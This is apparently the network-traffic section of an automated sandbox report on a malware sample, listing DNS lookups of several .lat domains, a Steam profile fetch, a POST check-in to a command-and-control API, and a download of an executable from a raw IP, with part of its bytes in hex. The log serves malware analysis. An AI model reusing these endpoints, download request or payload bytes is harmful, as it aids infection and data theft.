Dec 26, 2024 13:03:13.034065962 CET	49979	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:03:22.666500092 CET	443	49979	142.250.181.68	192.168.2.5
Dec 26, 2024 13:03:22.666603088 CET	443	49979	142.250.181.68	192.168.2.5
Dec 26, 2024 13:03:22.666757107 CET	49979	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:03:23.711894035 CET	49979	443	192.168.2.5	142.250.181.68
Dec 26, 2024 13:03:23.711920023 CET	443	49979	142.250.181.68	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 13:01:25.149801970 CET	58187	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:25.287941933 CET	53	58187	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:25.292052031 CET	61173	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:25.429610014 CET	53	61173	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:25.432079077 CET	64990	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:25.572324991 CET	53	64990	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:25.582954884 CET	58231	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:25.720722914 CET	53	58231	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:25.732878923 CET	50265	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:25.871109009 CET	53	50265	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:25.900917053 CET	51908	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:26.038872004 CET	53	51908	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:26.076951981 CET	65147	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:26.215660095 CET	53	65147	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:26.219001055 CET	62124	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:26.357084990 CET	53	62124	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:26.360816002 CET	51436	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:26.497849941 CET	53	51436	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:26.500906944 CET	65438	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:26.638988018 CET	53	65438	1.1.1.1	192.168.2.5
Dec 26, 2024 13:01:29.278388977 CET	50114	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:01:29.416239977 CET	53	50114	1.1.1.1	192.168.2.5
Dec 26, 2024 13:02:07.283324957 CET	53	53940	1.1.1.1	192.168.2.5
Dec 26, 2024 13:02:07.284955978 CET	53	63294	1.1.1.1	192.168.2.5
Dec 26, 2024 13:02:10.239382982 CET	53	63213	1.1.1.1	192.168.2.5
Dec 26, 2024 13:02:11.159959078 CET	64330	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:02:11.159959078 CET	65167	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:02:11.297563076 CET	53	64330	1.1.1.1	192.168.2.5
Dec 26, 2024 13:02:11.297574997 CET	53	65167	1.1.1.1	192.168.2.5
Dec 26, 2024 13:02:14.084453106 CET	56373	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:02:14.084630013 CET	52855	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:02:22.504578114 CET	53	51216	1.1.1.1	192.168.2.5
Dec 26, 2024 13:02:24.404606104 CET	53223	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:02:24.412513971 CET	56001	53	192.168.2.5	1.1.1.1
Dec 26, 2024 13:02:27.489876032 CET	53	60886	1.1.1.1	192.168.2.5
Dec 26, 2024 13:02:46.359703064 CET	53	51448	1.1.1.1	192.168.2.5
Dec 26, 2024 13:03:06.817527056 CET	53	53008	1.1.1.1	192.168.2.5
Dec 26, 2024 13:03:09.286402941 CET	53	56023	1.1.1.1	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Dec 26, 2024 13:02:14.499439955 CET	192.168.2.5	1.1.1.1	c2c2	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 26, 2024 13:01:25.149801970 CET	192.168.2.5	1.1.1.1	0xc549	Standard query (0)	observerfry.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:25.292052031 CET	192.168.2.5	1.1.1.1	0xcf8c	Standard query (0)	wordyfindy.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:25.432079077 CET	192.168.2.5	1.1.1.1	0x5ab3	Standard query (0)	slipperyloo.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:25.582954884 CET	192.168.2.5	1.1.1.1	0x2682	Standard query (0)	manyrestro.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:25.732878923 CET	192.168.2.5	1.1.1.1	0x3d97	Standard query (0)	shapestickyr.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:25.900917053 CET	192.168.2.5	1.1.1.1	0x6a4	Standard query (0)	talkynicer.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:26.076951981 CET	192.168.2.5	1.1.1.1	0x7c79	Standard query (0)	curverpluch.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:26.219001055 CET	192.168.2.5	1.1.1.1	0xf888	Standard query (0)	tentabatte.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:26.360816002 CET	192.168.2.5	1.1.1.1	0x3e6f	Standard query (0)	bashfulacid.lat	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:26.500906944 CET	192.168.2.5	1.1.1.1	0x6367	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:29.278388977 CET	192.168.2.5	1.1.1.1	0x9543	Standard query (0)	lev-tolstoi.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:02:11.159959078 CET	192.168.2.5	1.1.1.1	0x6250	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:02:11.159959078 CET	192.168.2.5	1.1.1.1	0x5ccc	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 26, 2024 13:02:14.084453106 CET	192.168.2.5	1.1.1.1	0x8640	Standard query (0)	js.monitor.azure.com	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:02:14.084630013 CET	192.168.2.5	1.1.1.1	0x4e3d	Standard query (0)	js.monitor.azure.com	65	IN (0x0001)	false
Dec 26, 2024 13:02:24.404606104 CET	192.168.2.5	1.1.1.1	0x707	Standard query (0)	mdec.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:02:24.412513971 CET	192.168.2.5	1.1.1.1	0xc78c	Standard query (0)	mdec.nelreports.net	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 26, 2024 13:01:25.287941933 CET	1.1.1.1	192.168.2.5	0xc549	Name error (3)	observerfry.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:25.429610014 CET	1.1.1.1	192.168.2.5	0xcf8c	Name error (3)	wordyfindy.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:25.572324991 CET	1.1.1.1	192.168.2.5	0x5ab3	Name error (3)	slipperyloo.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:25.720722914 CET	1.1.1.1	192.168.2.5	0x2682	Name error (3)	manyrestro.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:25.871109009 CET	1.1.1.1	192.168.2.5	0x3d97	Name error (3)	shapestickyr.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:26.038872004 CET	1.1.1.1	192.168.2.5	0x6a4	Name error (3)	talkynicer.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:26.215660095 CET	1.1.1.1	192.168.2.5	0x7c79	Name error (3)	curverpluch.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:26.357084990 CET	1.1.1.1	192.168.2.5	0xf888	Name error (3)	tentabatte.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:26.497849941 CET	1.1.1.1	192.168.2.5	0x3e6f	Name error (3)	bashfulacid.lat	none	none	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:26.638988018 CET	1.1.1.1	192.168.2.5	0x6367	No error (0)	steamcommunity.com		23.55.153.106	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:29.416239977 CET	1.1.1.1	192.168.2.5	0x9543	No error (0)	lev-tolstoi.com		104.21.66.86	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:01:29.416239977 CET	1.1.1.1	192.168.2.5	0x9543	No error (0)	lev-tolstoi.com		172.67.157.254	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:02:11.297563076 CET	1.1.1.1	192.168.2.5	0x6250	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:02:11.297574997 CET	1.1.1.1	192.168.2.5	0x5ccc	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 26, 2024 13:02:14.225853920 CET	1.1.1.1	192.168.2.5	0x8640	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:14.225853920 CET	1.1.1.1	192.168.2.5	0x8640	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:14.225853920 CET	1.1.1.1	192.168.2.5	0x8640	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:14.225853920 CET	1.1.1.1	192.168.2.5	0x8640	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:02:14.413232088 CET	1.1.1.1	192.168.2.5	0x9093	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:14.499344110 CET	1.1.1.1	192.168.2.5	0x4e3d	No error (0)	js.monitor.azure.com	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:14.499344110 CET	1.1.1.1	192.168.2.5	0x4e3d	No error (0)	aijscdn2-bwfdfxezdubebtb0.z01.azurefd.net	star-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:14.633094072 CET	1.1.1.1	192.168.2.5	0xdea	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:14.633094072 CET	1.1.1.1	192.168.2.5	0xdea	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:14.633094072 CET	1.1.1.1	192.168.2.5	0xdea	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:02:17.484002113 CET	1.1.1.1	192.168.2.5	0xbb5b	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:17.484002113 CET	1.1.1.1	192.168.2.5	0xbb5b	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:17.484002113 CET	1.1.1.1	192.168.2.5	0xbb5b	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 26, 2024 13:02:17.484328032 CET	1.1.1.1	192.168.2.5	0x7d15	No error (0)	consentdeliveryfd.azurefd.net	firstparty-azurefd-prod.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:24.634170055 CET	1.1.1.1	192.168.2.5	0x707	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 26, 2024 13:02:24.651515961 CET	1.1.1.1	192.168.2.5	0xc78c	No error (0)	mdec.nelreports.net	mdec.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

lev-tolstoi.com

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49743	185.215.113.16	80	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
Dec 26, 2024 13:01:53.601748943 CET	200	OUT	GET /off/def.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: 185.215.113.16
Dec 26, 2024 13:01:55.035161972 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Dec 2024 12:01:54 GMT Content-Type: application/octet-stream Content-Length: 2801664 Last-Modified: Thu, 26 Dec 2024 11:19:36 GMT Connection: keep-alive ETag: "676d3bc8-2ac000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 00 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 2b 00 00 04 00 00 c5 4d 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$+ `@ @+M+`Ui`D @ @ @.rsrcD``@.idata f@gtwxvlel@2h@vnlbxhun *@.taggant@+"@
Dec 26, 2024 13:01:55.035254955 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 13:01:55.035265923 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 13:01:55.035309076 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 13:01:55.035387993 CET	896	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 13:01:55.035399914 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 13:01:55.035410881 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 26, 2024 13:01:55.035422087 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: FMF IF IOF%Ij IUc IPF"I_F OMF IMF IMF IMF IMF IMF IMF IMF IMF IMF IMF IMF IkHH[MF*sHH[MF
Dec 26, 2024 13:01:55.035466909 CET	172	IN	Data Raw: 4f 2b 4a 46 27 4d 70 20 49 8e 62 20 49 4d 46 20 49 4d 46 20 49 df 47 20 49 df 47 20 49 50 46 20 49 61 46 20 4a 6b 48 48 6a 4d 46 2a 73 8f 99 6a 8b 4e 46 21 49 4d 46 20 49 59 46 20 49 c3 7a 4e 79 7b 79 50 7c 7e 7f 20 49 4d 46 25 49 b9 46 20 49 e9 Data Ascii: O+JF'Mp Ib IMF IMF IG IG IPF IaF JkHHjMF*sjNF!IMF IYF IzNy{yP\|~ IMF%IF IN Ip IUO IQ IpMF IZ IuL IpsI` I]F IpuF I` IH IpF IMF IOF J"]VH IM@"
Dec 26, 2024 13:01:55.035506010 CET	1236	IN	Data Raw: 7c 4d 5c 20 49 4e 46 20 49 6e 46 20 49 58 46 20 49 90 46 20 49 60 46 20 49 73 46 20 49 6e 46 20 49 82 46 20 49 65 46 20 49 51 46 20 49 52 46 20 49 50 46 20 49 56 46 20 49 4e 46 20 49 4f 46 20 49 54 46 20 49 4d 46 33 51 4e 46 20 49 4d 46 26 49 bd Data Ascii: \|M\ INF InF IXF IF I`F IsF InF IF IeF IQF IRF IPF IVF INF IOF ITF IMF3QNF IMF&IMSSFP3P&ILR\F&SMF&IL?RSFLPlO&IZM?RSFPlO&IM?RSFPlO&IM?RSFOP&ILRSFPlO&I$MjQSF\O3P&I>NRSFS;O&ILRSFS;O&IOTWFSP&IcQ*ISFR;O&IMRSFO;O&IORSF
Dec 26, 2024 13:01:55.154918909 CET	1236	IN	Data Raw: 49 4d 46 21 49 d9 4a 20 49 4f 46 fe 4e 4d 46 23 49 56 4c 20 49 51 46 e3 51 4d 46 25 49 c4 4b 20 49 53 46 5c 52 4d 46 27 49 8b 4a 20 49 55 46 35 53 4d 46 29 49 f1 4b 20 49 57 46 92 4d 4d 46 2b 49 04 4c 20 49 4e 46 72 4e 4d 46 21 49 b8 4e 20 49 4f Data Ascii: IMF!IJ IOFNMF#IVL IQFQMF%IK ISF\RMF'IJ IUF5SMF)IK IWFMMF+IL INFrNMF!IN IOFNMF#IZN)IO!I^FRSF9IO*IvFR]FQIO0IFR]FaIO0IFR]FqIO0IFR]FIO5IFR]FIO0IFR]FIO&IFRgFIO&IFRSFIO!I&GQRvFIxQLI.GVRFIqPaIFNFJxQkIF

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	23.55.153.106	443	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 12:01:28 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-26 12:01:29 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Dec 2024 12:01:28 GMT Content-Length: 35121 Connection: close Set-Cookie: sessionid=d9a670289c6fa342240024fa; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-26 12:01:29 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-26 12:01:29 UTC	10097	IN	Data Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09 Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-26 12:01:29 UTC	10545	IN	Data Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 Data Ascii: NIVERSE":"public","LANGUAGE":"english","COUNTRY":"US","MEDIA_CDN_COMMUNITY_URL":"https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/","MEDIA_CDN_URL":"htt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	104.21.66.86	443	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-26 12:01:30 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: lev-tolstoi.com
2024-12-26 12:01:30 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-26 12:01:31 UTC	1121	IN	HTTP/1.1 200 OK Date: Thu, 26 Dec 2024 12:01:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=er0m4i15rmfu2laqp2b9shbm30; expires=Mon, 21 Apr 2025 05:48:10 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Plb1PELSGQFZZ5NrRLf7UqOL0JLzE3vGSYX0MRkDBnzq3Qw5mpVHM8pLUlhx%2BcBVupElUdxpPzLfSi6CDFvMkIyl87E8qxPcEfwOmtfq63TL3ZecOXDkMmShrUt%2F7hFgU04%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f80eaa8dff41885-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1447&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1892417&cwnd=193&unsent_bytes=0&cid=45b8bdd246370e94&ts=764&x=0"
2024-12-26 12:01:31 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-26 12:01:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49706	104.21.66.86	443	4296	C:\Users\user\Desktop\z3IxCpcpg4.exe

Timestamp	Bytes transferred	Direction	Data
